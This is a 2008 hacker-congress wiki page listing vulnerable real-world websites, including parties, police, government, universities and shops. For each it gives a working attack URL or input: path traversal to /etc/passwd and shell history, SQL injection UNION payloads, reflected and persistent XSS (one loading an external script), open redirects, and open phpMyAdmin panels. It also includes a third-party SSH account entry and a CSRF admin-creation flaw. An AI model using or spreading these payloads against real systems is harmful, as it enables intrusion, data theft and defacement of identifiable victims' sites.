Hacked
From 25C3 Public Wiki
It starts again on 27.12.2008.
NPD stuff on the subpage
Just to add NPD stuff: we are currently investigating the NPD server "195.50.135.187". You can find more info here.
zombie resurrection hacks
- http://www.bzoe.at I'M BACK!
- http://www.bzoe.at/_phpmyadmin NO USER/PASSWORD, have fun.
- http://www.athletesconnection.com/ hacked yet again (they never secure the phpMyAdmin ;)
Foodhacks
- Burger-King Voucher-Generator is offline for now.
- Asia food (the 2nd one, the green signs) at the station gives 50c discount if you show your congress badge. good food there, I recommend #24b
Misc
- Spread the word:
- http://slanp.ch/modules.php?op=modload&name=phpBB_14&file=index&action=viewforum&forum=45&22987 (Username allows XSS)
- http://www.ctrl-alt-delete.info/index.php?include=gaesteliste
- http://www.provenzali.it/i.html
- http:////augenoptik-schmidt.de/
- http://www.conclusionimplementation.nl/
- http://www.unserabgeordneter.de/
- http://apollo.zeit.de/wo/article.php?id=232323
- http://www.cdu-taunusstein.de/home.php
- http://www.sbmtrader.com/
- http://www.esdi.es/blog/
- http://www.gryphondreaming.com/ (bottom banner)
- http://www.minis-widnau.ch/
- http://www.peg.ch/
- http://www.lars-lanfranchi.ch/
- http://www.dominic-schmitter.ch/
- http://www.hyundai-forstner.at/ (-->Angebote)
- http://virussentinel.com/
- BASH-Account (SSH open) Host: archibald.dreamhost.com; User: stfox100; Password: **********; Website: <http://www.sbmtrader.com/>; Debian 3.1; Kernel 2.4.32
- http://www.wabe-aachen.de/admin/pma/ open phpMyAdmin
- http://www.brandenburg.de/cms/detail.php/lbm1.c.396942.de or http://www.stk.brandenburg.de/gb_bbg/ (neither SQL injection nor XSS)
- Beware! rvr-prx.bayern.de (note /admin)
- Available before already and to everyone: Theeeeeeeee Telekom switch config
- ilch(.de)clan script: CSRF in the whole admin panel (e.g. adding admin user)
- Microsoft community site does not ... : http://channel9.msdn.com/Forums/Feedback/ (you wouldn't use this to freshen up all msdn forums, would you?)
- http://aktiv-boersma.de/Half_banner_234x60.gif boersma ******
- http://www.agenda21.de/phpmyadmin/ ? http://www.agenda21.de/php/config.inc !
- The three Dunkin' Donuts stores next to Alexanderplatz successfully d-dosed... please add pictures!
- http://www.youtube.com/watch?v=3b6Kzm6y6c0
- http://img387.imageshack.us/my.php?image=dscf4391it7.jpg
- http://img261.imageshack.us/my.php?image=dscf4383ax3.jpg
- The 25C3 was successfully d-dosed (at day1 already!), the BCC is constantly running near capacity.
- http://img187.imageshack.us/img187/1214/belkinroutermo7.png
- http://www.muho-mannheim.de/frame.php?path=http%26%23x003a;//www.google.com%23
- http://www.eduhi.at/eduhi/eduhi.php?url=http://www.google.com
- http://www.nplg.gov.ge/frames.php?url=http://www.google.com
- http://forum1.onlinewelten.com/redirector.php?url=http://www.google.de
- http://www.3dsupply.de/shop/search.php?query=%3Cimg+src%3D%27http%3A%2F%2Fevents.ccc.de%2Fcongress%2F2008%2Fwiki%2Fimages%2F4%2F43%2FVertical_banner_120x240.gif%27%3E+&query_submit=Los!&PHPSESSID=04ec6a59b208470cfa01ed5608d5435a Running around - loosin ma memory
- http://www.northwindsafety.com/JobsApp/ (User: anonymous, password: foobar)
- http://pirun.ku.ac.th/~cpcpyc/explorer.php?dir=.. and http://pirun.ku.ac.th/~cpcpyc/edit.php?dir=..&name=delete.php
- http://www.kapo.ch/index_nachladen.cfm?seite_nachladen=http://www.google.com
LFI/RFI
- http://pnos.ch/?lang=37&seite=../../admin/.htpasswd fs root groups version
- http://www.xkarinx.ch/_eb/m1/src_viewer.php?datei=../../../../../../root/.bash_history
- http://www.xkarinx.ch/_eb/m1/src_viewer.php?datei=../../../../../../etc/passwd
- http://www.psbnet.de/index.php?datei=../../../../../../../etc/passwd
- http://www.daewoo-center-essen.de/loader.php?datei=../../../../../../../etc/passwd
- typical 1&1 hosting - and so for the 3rd year in a row: http://tinyurl.com/1und2
- http://www.augenoptik-schmidt.de/news_popup.php?datei=../../../../../../../../../../../etc/passwd
- http://www.grundschule-hoeingen.de/news.php?datei=../../../../../../../../../../../etc/passwd
- http://www.elfi-schwarz.de/kurse.php?datei=../../../../../../../../../../../etc/passwd
- http://www.lohheide.de/admin.php?datei=../../../../../../../../../../../etc/passwd
- http://www.marine-marketing.gr/newsclip.php?file=../../../../../../../../../../../etc/passwd
- http://www.kirche-koeln-muelheim.de/termine/details.php?file=../../../../../../../../../../../etc/passwd
- http://www.ht-studios.de/go/profil/agb/download.php?file=../../../../../../../../../../../etc/passwd&type=text/plain&inBrowser=true
- http://chucothedriver.com/Travelogue/viewer.cgi?file=../../../../../../../../../../etc/passwd
- http://www.mbvan.org/cgi-bin/sch_art/read.php?file=../../../../../../../../../../../etc/passwd
- http://www.wechseljahre-remifemin.de/scripts/print.php?file=../../../../../../../../../../../etc/passwd
- http://www.brustkrebs-berlin.de/system_berlin/scripts/print.php?file=../../../../../../../../../../../etc/passwd
- http://www.daoc.drachengarde.org/index.php?seite=../../../../../../../etc/passwd
- http://www.washingtoninstitute.org/download.php?file=../../../../../../../../../../etc/passwd
- http://www.price2price.se/admin/includes/configure.php.bak
- http://www.bruegel.org/Public/fileDownload.php?target=../../../../../../../../../../etc/passwd
- http://www.mhi.uni-bonn.de/index.php?site=/etc/passwd
- http://www.reiki-in-berlin.de/cgi-bin/wps/xtra.cgi?filename=../../../../../../../../etc/passwd
- http://www.xanworld.com/show.php?file=../../../../../../../../../etc/passwd
- http://grox.net/misc/humor/show.php?file=../../../../../../../../../../etc/passwd
- http://www.leutek.de/compulight/download.inc.php?file=../../../../../etc/passwd
- cr4nk collection: http://nopaste.org/p/a0I6SIrBG
- http://www.qzedu.gov.cn/php/bak/qzedu_member.txt
- http://www.lithoart-ma.de/druck.php?file=../../../../../../etc/passwd
- http://www.maharashtra.gov.in/marathi/news/popupNewsShow1.php?file=../../../../etc/passwd
- http://www.searchpope.com/info.php?user=reiseleiterecuador&file=../../../../../../../../../../../../../../../../../../etc/passwd
- http://hallofshame.gp.co.at/index.php?file=../../../../../etc/passwd
- http://www.dickmannshenke.de/show.php?main=/../../../../../etc/passwd
- pick an account: http://www.kidlex.de/fp/user and login http://www.kidlex.de/FrontPublisher/admin.cgi/admin.86673/File_Manager.html?path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&action=editfile&file=passwd
SQL-Injection
- http://www.kammerspiele.ch/seite.php?id=1%20and%20sid%20is%20null (Splotches? JFGI!)
- http://www.tvinfo.de/exe.php3?showSenderID=23%20AND%201=0&target=senderlist.inc
- http://www.hamburg-messe.de/hmc/content/co/de/termine_inland.php?action=kurzinfos&id=168%27%20AND%201=0%20/*
- http://www.vwd.com/vwd/produkte.htm?u=0&k=0&sektion=4%20AND%201=0&seite=geschaeftsbereich
- http://www.mobile-city.org/index.php?nav=1%22
- http://www.mobile-city.org/index.php?nav=18&form_ich_will=J&form_nachname=SQL%27&send=ja
- http://www.mobile-city.org/index.php?mode=detail&page=59%27
- http://www-cgi.uni-regensburg.de/Studentisches/FS_Biologie/content/guestbook/guestbook.php?nav=guestbook&subnav=guestbook (minus: POST only; plus: value of captcha as plain text in html code)
- http://pp3.histechs.com/longthai/jsp/www/bonus.jsp?TopUserId=0&Month=200811&name=admin&passwd='%20or%201=1%20--'
- http://www.media-markt.de/top5/ansicht/index.php?pid=-1337%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,version(),23
- http://www.rg-bx.it/newslesen.php?id=1337%20union%20select%20%22Grüße%20vom%2025C3%22,%22%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E%22,5,23
- http://www.diechristen.at/index.php?seite=news&kat=foo%27%20union%20select%201,%22December%2027th%20to%2030th,%202008%22,3,4,5,6,%22%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E%22,8,9,10,11,12%20--%20
- http://www.cduhessen.de/home/lebenslauf.cfm?ID=-77%20UNION%20ALL%20SELECT%201,5,3,2,%22Have%20a%20great%20time%20on%2025c3%22,6,%22%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/4/43/Vertical_banner_120x240.gif%3E%22,8--
- http://www.cdu-erftstadt.de/index.php?id=1%20bla%20sql
- http://www.vernunft-schweiz.ch/links.php?link_id=6%20OR%201%20UNION%20select%201,2,(select%20count(*)%20from%20links),4,5,6%20from%20links
- http://www.demanagement.com/property.php?propertyID=%27FAIL
- http://www.thegiggallery.com/index.php?f=bd&iz=0%20and%200%20union%20select%20(select%20count(*)%20from%20tbl_poster),2,3
- http://www.visitmadisoncounty.com/lodging_details.php?LodgingID=0%20union%20select%200,char(60,98,32,115,116,121,108,101,61,99,111,108,111,114,58,114,101,100,62,50,53,67,51,60,47,98,62),3,4,5,char(45),7,8,char(66,67,67),10,char(66,101,114,108,105,110),char(71,101,114,109,97,110,121),char(32),char(45),char(45),12,13,char(45),char(101,118,101,110,116,115,46,99,99,99,46,100,101,47,99,111,110,103,114,101,115,115,47,50,48,48,56,47),16,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
- http://www.congetzchaim.com/noahsclassifieds/index.php?method=showdetails&list=advertisement&rollid=%27EVIl%20SQL%20HERE&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=%273
- http://pnos.ch/?seite=meldungen_detail.php&sprache=37&meldungid=0%20union%20select%201,0,char(50,48,48,56,45,49,50,45,50,55),char(50,53,67,51,32,111,119,110,115,32,121,111,117),char(60,97,32,104,114,101,102,61,104,116,116,112,58,47,47,101,118,101,110,116,115,46,99,99,99,46,100,101,47,99,111,110,103,114,101,115,115,47,50,48,48,56,47,62,60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,101,118,101,110,116,115,46,99,99,99,46,100,101,47,99,111,110,103,114,101,115,115,47,50,48,48,56,47,119,105,107,105,47,105,109,97,103,101,115,47,52,47,52,51,47,86,101,114,116,105,99,97,108,95,98,97,110,110,101,114,95,49,50,48,120,50,52,48,46,103,105,102,62,60,98,114,62,104,116,116,112,58,47,47,101,118,101,110,116,115,46,99,99,99,46,100,101,47,99,111,110,103,114,101,115,115,47,50,48,48,56,47,60,47,97,62),1%20as%20public%20--
- http://www.hwk-saarland.de/index.php?nav=1%22
- http://www.geneve.ch/police/communiques/divers/welcome.asp?comId=%27%20or%201
- http://www.ti.ch/DI/POL/comunicati/area_stampa/scheda.asp?Applikation_name=rubati&ID=EVIL SQL
- http://www.ti.ch/DI/POL/comunicati/area_stampa/archivio/default_archivio.asp?anno=%27EVIL%20SQL
- http://www.franjamoradarosario.org.ar/modulos/mmdle.asp?id=%27EVIL%20SQL
- http://www.franjamoradarosario.org.ar/modulos/feedback.asp?form=%27EVIl%20SQL
- http://www.jesus.ch/index.php/D/search/?searchHow=all&searchField=all&searchOrder=publishStart&searchString=&imageField.x=0&imageField.y=0 (Play with parameters)
XSS
- http://www.mannheim.de/io2/browseSearch_do.doB?currPath=%2FWebseiten&search=\'\"<img src=http://events.ccc.de/congress/2008/wiki/images/4/43/Vertical_banner_120x240.gif>
(search is also VERY easy to XSS)
- http://www.hotelstandby.de/ (the destination is echoed back...)
- http://goellheim.de/cgi-bin/kalender/webcal/webcal.cgi (PERSISTENT!)
- http://jugendwahlrecht.de/gb.php (PERSISTENT)
- http://wdg-pocking.de/lehrer/pwforder.php or pwsend.php via POST (var name: T2 (email)), ' and " escaped -> scr=...
- http://www.orf-gis.at/index.php?kategorie=suchen&thema=suchen&search_exp=q%3D%22%3E%3Ch1%3E%3Cfont+color%3Dgreen%3EWhy+should+we+trust+%3Cfont+color%3Dred%3EYOU%3C%2Ffont%3E%3F%3Cbr%3E%3Cimg+src%3Dhttp%3A%2F%2Fevents.ccc.de%2Fcongress%2F2008%2Fwiki%2Fimages%2F4%2F43%2FVertical_banner_120x240.gif%3E%3Cx
- http://www.terratec.net/de/treiberundsupport/faq_32476.html?selectproduct=Security%20%3Cp%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/4/43/Vertical_banner_120x240.gif%3E%3C/p%3E
- http://www.spd-hessen.de/.net/-1/html/11681/welcome.html ... I wish you a merry election campaign.
- http://www.rtlradio.de/index.php (the search at the top left...)
- https://www.csu.de/partei/profil.htm?app=benutzervergessen post code in 'email': " onmousemove="alert("25C3")" [leave it with all quotation marks]
- http://www.junge-union.de/content/aktivwerden/absenden/ post code for e.g. aktivwerden_vname: "> <img src=http://ccc.de/images/banner/25c3_banner.gif>
- http://www.jusos.de/ post code in the search field:<img src=http://ccc.de/images/banner/25c3_banner.gif>
- https://www.taz.de/zeitung/formulare/keinetaz/ Just enter in every field
- http://www.bernd-schmidbauer.de/index.php?cat=search Insert: <img src="http://events.ccc.de/congress/2008/%46ahrplan/images/conference-128x128.png"> in the search form
- http://www.petra-merkel.de/service/suche/ Insert: <img src="http://events.ccc.de/congress/2008/%46ahrplan/images/conference-128x128.png"> in the search form
- http://strobe.uwaterloo.ca/ist/keyword/keyword.php?searchterm=<iframe src=http://events.ccc.de width=600 height=480></iframe>
- http://waz.trauer.de/suchergebnis.html?firstname=&lastname=<img src="http://events.ccc.de/congress/2008/Fahrplan/images/conference-128x128.png">
- http://www.euv-frankfurt-o.de/de/search/index.html Insert: "<img src=http://events.ccc.de/congress/2008/wiki/images/4/43/Vertical_banner_120x240.gif>
- http://www.police.be.ch/site/suche.htm?headerQuery=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.pom.be.ch/site/suche.htm?vtid=0&headerQuery=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.jura.ch/portal/site/acju/template.acjusearch/?simpleSearchQuery=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.kapo.zh.ch/internet/ds/kapo/de/search.html?search=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.chur.ch/d/search/index.cfm?criteria=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.eif.ch/searchLDAP.jsp?inputSearchText=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.repolagsued.ch/_iu_write/phpwcms/image_zoom.php?show=Ij48aW1nIHNyYz1odHRwOi8vZXZlbnRzLmNjYy5kZS9jb25ncmVzcy8yMDA4L3dpa2kvaW1hZ2VzLzYvNjcvMjVDMy1sb2dvLnBuZz4=
- http://www.lugano.ch/tools/search.cfm?keywords=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.pennergame.de/pw_forgotten/ Insert: <img src=http://events.ccc.de/congress/2008/wiki/images/4/43/Vertical_banner_120x240.gif> in the email field..
- http://www.jesus.ch/index.php/D/search/?searchHow=all&searchField=all&searchOrder=publishStart&searchString=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.brack.ch/ (enter “"><img src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png>” in search)
- http://www.iadb.org/search/?query=%22%3Cimg+src%3Dhttp%3A%2F%2Fevents.ccc.de%2Fcongress%2F2008%2Fwiki%2Fimages%2F4%2F43%2FVertical_banner_120x240.gif%3E&lang=en
- http://uni66.ogame.de/game/redir.php?url=%23%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/4/43/Vertical_banner_120x240.gif%3E#\
- https://q.inter.net/sms/sms.cgi with username POST “" size=20 style="WIDTH: 250px"><img src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png><input type="text" value="Greetings from 25C3“
- http://www.tagesschau.de/multimedia_suche.jsp?suchbegriff=%22%3Cmeta+http-equiv%3D%22refresh%22+content%3D%221+URL%3Dhttp%3A%2F%2Fwww.shortlink.org%2Fmeldung%22%3E%22
- http://phase2.nadir.org/index.php?seite=5&operator=AND&alle=%3Cmeta+http-equiv%3D%22refresh%22+content%3D%220%3B+URL%3Dhttp%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeIgCIVQM9W8%22%3E
- http://events.ccc.de/congress/2008/wiki/index.php?useskin=%3C%2F%73%74%79%6C%65%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%2E%63%6B%65%72%73%2E%6F%72%67%2F%78%73%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%74%79%6C%65%3E%0A
Wallhacks
We proudly present the new real life category of hacking.
Hackcenter: http://img81.imageshack.us/my.php?image=wallhackwb5.jpg